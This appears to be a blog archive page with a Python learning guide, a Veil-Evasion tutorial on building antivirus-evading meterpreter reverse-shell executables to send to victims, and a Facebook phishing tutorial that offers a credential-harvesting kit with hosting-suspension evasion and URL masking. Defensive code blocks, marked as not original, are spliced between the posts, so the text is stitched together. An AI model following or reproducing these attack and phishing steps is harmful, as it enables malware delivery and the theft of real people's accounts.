Monday, 21 December 2015

Python: Noob Friendly Programming Language To Start Coding

Python is exploding. And there’s a reason for that. It’s awesome! It seems everyone is learning it, teaching it, and hacking with it. Folks are even making python puppets and writing poetry in Python. While Python is easy to learn, it’s not necessarily easy to learn.

This is not a discussion on how to hack or program with python, it’s a discussion on why I personally chose python as my first programming language. I’m not a developer, I’ve never written a program from source code to production. So when I started looking for a language to jump into I wanted something that could be used as a stepping stone for lower level languages.
I chose python simply because I wanted to learn programming logic first, and syntax second. For those of you unfamiliar with those terms, logic is how a program runs. It’s the decision-making process that determines what comes next, and it is built from conditional statements such as if, if not, else, or, etc. It’s the heart of any programming language and is usually the measure that separates good programmers from bad ones.
Syntax is how a program is written; it’s the way a language looks and reads/writes. Essentially, syntax is programming grammar. Unlike grammar in the English language (which I admit to being poor at), programs will NOT work unless you get the syntax exactly correct.
Logic is basically universal amongst all programs and to me is the difficult part, while syntax can vary. This is exactly why I wanted to learn the logic first: once you understand how programming works you can kind of look at any program and pick it apart.

For example, in Java you would program:

    public class HelloWorld {
        public static void main(String[] args) {
            System.out.println("Hello, World!");
        }
    }

But in python 3 you would type:

    print("Hello, world!")

As you can see these two look very different, but they do the same thing. They print “Hello, world!” to standard out. As you can see Java has quite a bit going on compared to python but there are similarities behind each of the languages. The string “Hello, World!” that is printed to standard out is encased within quotes, and you call a function to print within each language. System.out.println() in Java and print() in python3. As you begin to learn more about functions, modules, libraries, variable declaration, objects, data structures and so on you will find that the similarities are even more apparent and your ability to decode them will expand. This is why many people can program or work in several languages.
As you saw from the above example, python is a very compact and concise language. If you combine the large community, human-readable syntax, powerful libraries and the quantity of tutorials, it’s easy to see why I started with python.
I did not learn from one resource and I bounced around between several sites and books. While I am not fluent in python I offer this bit of advice. Stick with it, programming is difficult. It’s easily the most difficult thing I’ve ever had to learn in my life. I found that even though I struggle with learning concepts and logic, after a while my mind adapts and I begin to understand concepts that used to give me a lot of trouble. So stick with it.
If you’re interested in python I recommend learning from the following resources in the following order. The following are the amazing resources I discovered and the hard-won lessons I learned on my adventure into programming.

Hack Through the Thicket

The best way to learn Python is with a project. Think of a (simple) problem you want to solve and start writing the program to get to the solution. I got sucked in with Twitter bots. I have a love/hate thing for Twitter. It’s like watching a river… a river full of garbage. But it’s a great place to learn Python. It’s so much fun to hack Twitter. It’s an incredible game of strategy: how much can you get away with before your account gets suspended? The best part is seeing immediate results. I was hooked when I wrote my first Twitter bot and saw the status update appear on my time line. “Hello, World!” on your Twitter account is much cooler than “Hello, World!” on your IDLE prompt.
I understand that it can be difficult for a beginner to think of a project when he or she doesn’t know what the language is capable of doing. Here’s a starter project that you, knowing nothing about Python at the outset, could easily accomplish in a day:
write a password generator.
You will utilize all the basics, and then some, in writing a program that produces the perfect password. It’s a very simple script, but you can geek-out and get crazy complex with it.
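
One way to write that starter project, as an added example that is not code from the original post. It assumes Python 3.6 or later and uses the standard `secrets` module, because the `random` module is not designed for security purposes; the character classes are this example's own choice.

```python
import math
import secrets
import string

# Character classes the generated password must draw from (an assumption of
# this example; adjust to the policy of the system you generate for).
CLASSES = (
    string.ascii_lowercase,
    string.ascii_uppercase,
    string.digits,
    "!#$%&*+-=?@^_",
)
ALPHABET = "".join(CLASSES)


def generate_password(length=16):
    """Return a random password with at least one character of each class."""
    if length < len(CLASSES):
        raise ValueError("length must be at least %d" % len(CLASSES))
    # Rejection sampling: draw every character uniformly from the whole
    # alphabet with the OS CSPRNG and retry until all classes are present.
    # Every accepted password is equally likely, which is not the case for
    # "pick one per class, fill the rest, then shuffle" constructions.
    while True:
        candidate = "".join(secrets.choice(ALPHABET) for _ in range(length))
        if all(any(c in cls for c in candidate) for cls in CLASSES):
            return candidate


def entropy_bits(length, alphabet_size=len(ALPHABET)):
    """Upper bound on the entropy, in bits, of a uniformly random password."""
    return length * math.log2(alphabet_size)


if __name__ == "__main__":
    print(generate_password(16), "(about %.0f bits)" % entropy_bits(16))
```
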

Hit the Books

Before you start or hack an existing project, you need to know the basics. There are a lot of Python books out there. While all of them will teach you what you need to know, some are better than others. These are my favorites, in order of accessibility:

1. Think Python

Downey gets you thinking like a programmer, which is more important than knowing or learning what every damn little thing does. Don’t fill your brain with this stuff. That’s what Google is for.
Each chapter is loaded with exercises that ask you to use what you just learned to solve interesting, more or less practical, problems.
It’s free online.

2. python.org

Seriously, what better place to learn Python than from the source. The tutorials are actually good. It’s like they really want you to learn this stuff. It’s technically not a book, but what’s a book anymore?

3. Practical Programming

This book is very good at not only explaining how Python works, but how your computer works as well, and why it’s important to know as a programmer. The authors also run a MOOC on Coursera, but the book is so much better. Buy it on Amazon.

4. Real Python for the Web

The Real Python ebook package is amazing. You will go from noob to (almost) pro in an amazingly short amount of time. As the title suggests, it’s catered to those wanting to use Python for web development. If that’s you, throw down the money and get the bundle. It’s worth every penny.
The three gentlemen behind Real Python are approachable, knowledgeable, and witty. They sporadically post tutorials on their blog that range from beginner to advanced. Start with Lyricize: A Flask app to create lyrics using Markov chains. You will not only learn Python, you’ll be introduced to Flask and Markov chains while creating an app that is pretty cool.

5. Writing Idiomatic Python

Jeff Knupp knows his stuff. Much of what he covers in his book is advanced, but what better time to learn best practices than when you’re just starting out. The examples are easy to follow and understand and you will be setting yourself up for the future. His blog, Everything I Know About Python…, is specifically focused on web developers using Django or Flask, but he often writes about Python in general. Starting a Python Project the Right Way is an excellent introductory post.


Non-trivial Pursuit

StackExchange

Search for solutions to your problem. I don’t mean that in some metaphysical, philosophical way. I mean use a search engine. When you do, go to any Stack link first. There are a lot of content farms and dead end links out there. Your time is precious, especially when you’re learning Python in your free time. Go to Stack Exchange and you will find more than one answer and often an interesting debate about best practices.
Caveat: Stack Exchange can be frustrating for beginners because you have to earn reputation points. It makes sense, but it also makes it seem impenetrable. Pay your dues. It’s worth it. Also, it’s not just for programming. It’s massive.

GitHub

GitHub is a great resource for beginners because so many beginners create repositories for their early projects. These simple programs will demonstrate how to practically implement the concepts you are learning elsewhere. I found countless Twitter bot scripts on GitHub that I downloaded, hacked, and modified. When you define the problem you want to solve, search GitHub. Chances are someone else already wrote a solution. Clone or fork their repo and see how they solved your problem. Then proceed to tear it apart until it does exactly what you want. To get started with GitHub, create an account and check out their bootcamp.
If you take this approach you’ll begin to get comfortable with Git and Github. If you want to get serious, and you’re also a Linux enthusiast, you should learn both. A lot of Pythonistas swear by Mercurial and Bitbucket. I’ve only used them cursorily, so I can’t say anything one way or another. I started with Git. It works for me. I’ll stick with Git.

Lists & Newsletters

Tutor

Sign up for the Python Tutor list. I learned, and still learn, so much from it. But, be warned. The temperament of the list changes seasonally. It will swing from compassionate to cruel. When it turns sour, I usually unsubscribe for a few months, and I’ll resubscribe when I need help with a problem and stick with it until it gets bad.
Also, your Inbox will quickly fill up with mail from the list. You should read every email and follow the discussions as they evolve, even if you don’t grok.

Python Weekly

Sign up for Python Weekly. While most of it will be over your head in the beginning, you will receive an excellent recap of the goings-on in the Python community for the past seven days. Read through ALL of the headlines, but only click on those that you understand. After a few months, you’ll be opening every link and frustrated because you don’t have enough time to read and work through all of the posts.

The Stuff That’s Really Popular

You may have noticed that there are a number of obvious omissions from my lists above.
Everyone cites Zed Shaw’s Learn Python the Hard Way. It’s an excellent overview, but it’s not beginner-friendly. It was one of the first resources I encountered, but I could not stick with it. Now that I know the basics and I work back through Zed’s tutorials, I am able to see that it’s very good, but better suited for someone with programming experience making a transition to Python.
Some people love Codecademy, but I felt like they were holding my hand through the lessons and when they let go at the end, I was completely lost. Also, programming in a browser based shell doesn’t feel right. If you really want to learn Python, do it locally, with IDLE or your shell.
My last employer was a lynda.com subscriber, so I took advantage of the opportunity and, well, slept through the Python courses they offered. I find screencasts very hard to watch.
And then there’s the MOOCs: Coursera, edX, and Udacity. I’ve started and never finished courses in each. I find the pace of MOOCs frustratingly slow and unless you’re taking the course in real time, you can’t access the faculty or community for help when you hit a wall. If you have A LOT of time to kill, take these courses. Otherwise, carve your own path. You’ll learn much more and arrive at the same destination much faster.

Conclusion

I hope these suggestions are useful and helpful. At the end of the day, you are your best resource. You drive the learning, don’t let the learning drive you. In the spirit of the origins of the language, the best way to learn Python is with a sense of humor. Now get hacking.

Saturday, 19 December 2015

How To Bypass Antivirus Detection Using Veil-Evasion In Kali Linux

Veil is a Python program that attempts to automate the creation of AV-evading payloads in a new framework. One of the most important issues any hacker must address is how to get past security devices and remain undetected. These can include antivirus software, intrusion detection systems, firewalls, web application firewalls, and numerous others. As nearly all of these devices employ a signature-based detection scheme where they maintain a database of known exploits and payload signatures, the key is to either create your own exploit, or change the signature of a known exploit or payload.
As creating your own exploit and payload is both time-consuming and requires advanced skills, the novice hacker is better served by first attempting to change the signature of the exploit and payload.
Veil-Evasion was specifically developed to enable you to change the signature of your payload. It is written in Python, but has numerous encoders to enable you to rewrite your code to evade detection in multiple ways.

Some days ago Veil v2.0.4 was released. I want to talk about it and give some examples of how to bypass several anti-virus products.

The main changes in this version are:
  • x64 compatibility – They have updated their setup script in order to make Veil compatible with both x86 and x64 versions.
  • Update Feature – Veil now has an update function. We can now update Veil from either the command line or the menu.
There are tutorials available at http://www.veil-evasion.com The framework can be downloaded from Chris' github at https://github.com/ChrisTruncer/Veil/ or at https://github.com/ChrisTruncer/Veil/archive/master.zip.

How to setup?

Veil-Evasion’s code is located at https://www.github.com/Veil-Framework/Veil-Evasion/ and it’s a part of the Veil super project at https://github.com/Veil-Framework/Veil which we recommend most users clone and install.

We can also use the payloads from the Metasploit framework. Veil is compatible with both x86 and x64 architectures, and it can be updated from either the command line or the menu.

If you want to install Veil in your own environment you can use the commands below:
#wget -c https://codeload.github.com/Veil-Framework/Veil-Evasion/zip/master
#unzip -q master.zip
#cd Veil-Evasion-master/setup
#./setup.sh

If you want to work with Kali Linux, with the commands below it will be enough:

apt-get update
apt-get install veil

I am using Kali Linux for this tutorial, so I will start with the second one.


1. Install Veil-Evasion


We first need to install Veil-Evasion on our system. We can download it from the Kali repository. Simply type:
kali > apt-get install veil-evasion

To start Veil-Evasion, just type:
kali > veil-evasion

When you do so, you will be greeted with this opening screen:

Veil will now begin its installation. It will ask you whether you want to install dependencies; tell it "y" for yes. Next, Veil-Evasion will begin to download all its dependencies. This can take awhile, so be patient. Eventually, Veil-Evasion will ask you whether you want to install Python for Windows. Select "Install for all users" and click the "Next" button.

Use the default directory when the install wizard asks, and then you will be greeted by a screen like below. Click "Next."

Eventually, you will come to a screen like that below. Go ahead and click "Next" again.

Continue to click "Next" through several screens until you finally come to a window with the "Finish" button. Click it. Eventually, your patience will be rewarded when you finally arrive at the screen below. Now we are ready to begin to use Veil-Evasion to create a nearly undetectable payload.


2. Create an EXE with a Payload


In this first step, we will create a simple .exe file that will contain a payload that enables us to own the victim's system. This could be used to send to the victim and having them click on it to execute it. Generally, this type of attack will be part of a social engineering attack.

Let's now type "list" as this will list all of the payloads that Veil-Evasion can work with.

Those of you who are familiar with Metasploit will recognize many of these payloads.


3. Use a Payload


In this case, let's use the ruby/meterpreter/rev_tcp, or number 44. Let's type:
> use 44

When we do so, Veil-Evasion will come back with a screen like below asking us to set the options.

We will need to set LHOST and LPORT.
> set LHOST 192.168.1.101
> set LPORT 6996

Of course, use the appropriate IP address and port for your circumstances.

Next, we need to tell Veil-Evasion to generate the executable.
> generate

As you can see in the screenshot above, Veil-Evasion has generated a new .exe file that I have named "newpayload.exe" (you can name it whatever you please).


4. Generate an Encrypted Payload to Evade Detection


Next, let's attempt to create an encrypted payload that we can get past AV software and other security devices. In this case, we will use a different payload on the payload list, namely python/shellcode_inject/aes_encrypt. This payload type uses VirtualAlloc injection, which creates an executable area in memory for the shellcode and then locks that memory area in physical memory.

This is number 32 on our payload list, so type:
> info 32

It then returns info on this payload as seen below.

This payload uses VirtualAlloc injection in conjunction with AES encryption (AES is the Advanced Encryption Standard, generally regarded as among the strongest encryption available) to obfuscate its true nature from AV software and other security devices.

Next, let's tell Veil-Evasion we want to use this payload.
> use 32

Here we have the option to change the default options if we care to do so. For now, let's leave the default options as they are.

Next, let's tell Veil-Evasion we want to generate this encrypted payload.
> generate

When we do so, it will use the default payload windows/meterpreter/reverse_tcp and then prompt us for the LHOST and LPORT. When we finish entering the appropriate information for our payload, it will begin to generate the shellcode. This can take a few minutes, so be patient.

Next, Veil-Evasion will prompt us for what we want to name our payload. You can use whatever name your heart desires, but I used the simple "veilpayload."


Finally, Veil-Evasion will complete its work and present us with the finished product, as we see below.

This new code with the meterpreter embedded within will get past most AV software and security devices. Like anything else, the AV developers will likely find a way to detect even this payload, so be creative and try other payload obfuscation methods in Veil-Evasion until you find one that hides your payload.
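
Seen from the detection side, the signature-matching and encryption passages above come down to this added example (not from the original post or the Veil project): a static byte-signature check finds nothing once content is encrypted, but encrypted regions stand out by their byte entropy. The signature, the sample buffers, the window size and the threshold are all constructed for illustration.

```python
import hashlib
import math
from collections import Counter

# Constructed, harmless stand-in for a byte pattern a signature database
# would hold. It is not taken from any real product or sample.
SIGNATURE = b"CONSTRUCTED-DEMO-SIGNATURE"


def signature_match(blob, signatures=(SIGNATURE,)):
    """Static signature check: does any known byte pattern occur in blob?"""
    return any(sig in blob for sig in signatures)


def shannon_entropy(blob):
    """Shannon entropy of the byte distribution, in bits per byte (0 to 8)."""
    if not blob:
        return 0.0
    total = len(blob)
    return -sum(n / total * math.log2(n / total)
                for n in Counter(blob).values())


def high_entropy_windows(blob, window=1024, threshold=7.5):
    """Offsets of non-overlapping windows whose entropy exceeds threshold.

    Window size and threshold are assumptions to tune on your own corpus.
    """
    return [off for off in range(0, len(blob) - window + 1, window)
            if shannon_entropy(blob[off:off + window]) > threshold]


def pseudo_ciphertext(n, seed=b"constructed"):
    """Deterministic high-entropy bytes standing in for an encrypted region."""
    out = b""
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(seed + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:n]


def build_samples():
    """Two constructed buffers: a plain one and one with an encrypted region."""
    filler = (b"ordinary program text. " * 100)[:2048]
    plain = filler + SIGNATURE + filler
    packed = filler + pseudo_ciphertext(2048) + filler
    return plain, packed


if __name__ == "__main__":
    for name, blob in zip(("plain", "packed"), build_samples()):
        print(name, "signature:", signature_match(blob),
              "high-entropy offsets:", high_entropy_windows(blob))
```

High entropy also appears in compressed archives and legitimate installers, so treat a hit as a reason to inspect further, not as a verdict.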


5. Checking Antivirus detection


Now we have our executable and we are going to submit it to vscan.novirusthanks.org. Please remember to check "Do not distribute the sample". If you choose not to check this option, or you decide to submit the executable to www.virustotal.com, your file will be investigated and maybe it will be recognized by some anti-virus vendors.

You can see in the picture below that none of the anti-virus vendors have detected our file as malicious. We have got a detection rate of 0%!

Evading security software and devices is among the most important tasks of the hacker, and Veil-Evasion is another tool in our arsenal. Keep in mind, though, that there is NEVER a single, final solution. The hacker must be persistent and creative in finding ways past these devices, so if one method fails, try another, then try another, until you find one that works.

Friday, 18 December 2015

Hack Facebook Using Phishing 2016 - Bypassing Security Check (Responsive)

This is a complete tutorial for creating a Facebook phishing site in 2016; newbies can follow this tutorial very easily. There are many ways to hack Facebook accounts, but unfortunately not everything works properly nowadays because today's IT security systems are so well developed, especially Facebook's. Phishing is the popular method to hack FB, but there are a lot of problems these days: everybody can create a phishing page, but the problem comes when hosting on free host sites like 000webhost.com, which will suspend the account immediately, and some browsers will also warn that it is a fake page. As a solution, I have bypassed all the above issues, and it will remain unsuspended and undetectable for browsers.

Warning & Disclaimer: Making a phishing page is not illegal, but using a phishing page is illegal. This tutorial is just to show you, "How to create phishing page?". If you use this to hack anyone's account, then I am not responsible for it. Do anything at your own risk.

I have included the responsive Facebook phishing page files in this tutorial, so it won't take you a lot of time to demonstrate a phishing page yourself.


Features 

  • No suspension (From free web host)
  • Undetectable (Browser security check bypassed)
  • Responsive (It will work with Mobile And Desktop)
  • Url Mask (Hiding or changing phisher url)


I have sorted this tutorial into 4 steps:

  1. Download the attachment file (size: 2.16 MB)
  2. Sign up to Free web host and upload the files
  3. URL masking/hiding
  4. Responsive Demonstration 

Step 1: Download the Attachment file

First of all download the attachment file named 'responsive-facebook.zip' file from here.

Extract the zip file and you will see 10 files named (data.php, data1.php, index.php, Mobile_Detect.php, desktop.jpg, follow.jpg, follow.jpg, desktop_files.zip, login_files.zip, users.txt) see below screenshot.



If you want to know how can you create yourself a phishing page then i recommend you to read my previous article: Create Undetectable Facebook Phishing Site - Advanced


Step 2: Sign up to Free web host and upload the files

I prefer 000.webhost.com.

Go to: https://members.000webhost.com/signup  and fill out the information needed and click on Create My Account.

Open your email and verify the account. You will see the active domain in your account; then click on Go to CPanel (highlighted in the screenshot below).


Now open the first file manager icon under File managers section.

Open up the “public_html” folder and delete the 2 files inside it. Then click on “upload”.


  • Below “Archive” section on the right side click on “Choose file“, Select the 2 files from downloaded attachment in step 1 (login_files.zip, desktop_files.zip)
  • Below “Files” section Choose the remaining 8 file (data.php, data1.php, index.php, Mobile_Detect.php, desktop.jpg, follow.jpg, follow.jpg, users.txt) 
  • Click on the “green tick“.

Done! Now, when your hosting provider tests your content, they will get an innocent PHP file reading another file, and when they try to access the "login.jpg" file they will get an invalid/corrupted image.

Now access your URL with this id at the end (/?id=facebook). This unique URL is important for bypassing the security check, and I set the default id as facebook for this tutorial.

Example: "www.autolikerfb.comxa.com/?id=facebook"(See the Screenshot below)

When the victim enters the email and password in the above page, they will be stored in our 'users.txt' file; to see that, click the view button next to the users.txt file.

Inside users.txt file you can see the victim's email and password (highlighted part in below screen shot).

Finally you have your phisher link like this: www.autolikerfb.comxa.com/?id=facebook


Step 3: Url Masking/Hiding

Now you have to hide the URL. That way it can be less suspicious. So here we use Dot TK URL shortening. Your actual phishing URL can create a sense of doubt in the victim's mind, so we can hide the URL. Dot.tk is an online service which enables you to hide/mask the URL.

1. So, go to http://www.dot.tk/en/index.html?lang=en to hide a url.

2. Select shorten URL then enter your phisher link in the textbox and hit on Next. (our Phisher link: www.autolikerfb.comxa.com/?id=facebook )

3. Enter the link you want to rename your phisher link to dot.tk domain name. (domain: autolikerfb )

Now we have the phishing url shortened like below:

www.autolikerfb.comxa.com/?id=facebook  =  autolikerfb.tk

Now, you can send this masked phisher link to your victim.

The victim will now find our phisher link less suspicious as we have hidden the actual phisher link using .tk domain.
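
What a mail filter, proxy or awareness tool can check about links like the ones above, as an added example that is not part of the original post: the hostname that serves a brand's login form has to be the brand's own domain, whatever the rest of the URL says. The allowlist, the function names and the last two sample URLs are assumptions constructed for this example.

```python
from urllib.parse import urlsplit

# Domains that legitimately serve the brand's login page (assumption of this
# example; a real deployment maintains such a list per protected brand).
BRAND = "facebook"
LEGIT_DOMAINS = ("facebook.com", "fb.com", "messenger.com")


def is_legit_host(host):
    """True only for an allowlisted domain or a true subdomain of one."""
    return any(host == d or host.endswith("." + d) for d in LEGIT_DOMAINS)


def assess(url, shows_brand_login):
    """Return the reasons a URL is suspicious (empty list: none found).

    shows_brand_login says whether the page at this URL presents the
    brand's login form, e.g. as determined by a content classifier.
    """
    parts = urlsplit(url if "://" in url else "http://" + url)
    host = (parts.hostname or "").rstrip(".").lower()
    if not host:
        return ["unparseable: no hostname"]
    if is_legit_host(host):
        return []
    reasons = []
    if shows_brand_login:
        reasons.append("brand login form on non-brand host")
    if BRAND in host:
        reasons.append("brand name used inside an unrelated hostname")
    if parts.username:
        reasons.append("userinfo before '@' hides the real host")
    if BRAND in (parts.path + "?" + parts.query).lower():
        reasons.append("brand name in path or query of a non-brand host")
    return reasons


SAMPLES = [
    ("https://www.facebook.com/login.php", True),      # genuine
    ("www.autolikerfb.comxa.com/?id=facebook", True),  # from the text above
    ("autolikerfb.tk", True),                          # from the text above
    ("http://facebook.com.login.example/", False),     # constructed
    ("http://facebook.com@203.0.113.5/", True),        # constructed
]

if __name__ == "__main__":
    for url, shows_login in SAMPLES:
        print(url, "->", assess(url, shows_login) or "no findings")
```

Run the check on the URL that finally serves the form, after following any redirect or frame from a shortened or masked link.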


Step 4: Responsive Demonstration 

Here is the screenshot of autoliker.tk in mobile view and desktop version. It will automatically redirect to the original Facebook page on login.


[Screenshots: Mobile View, Desktop View]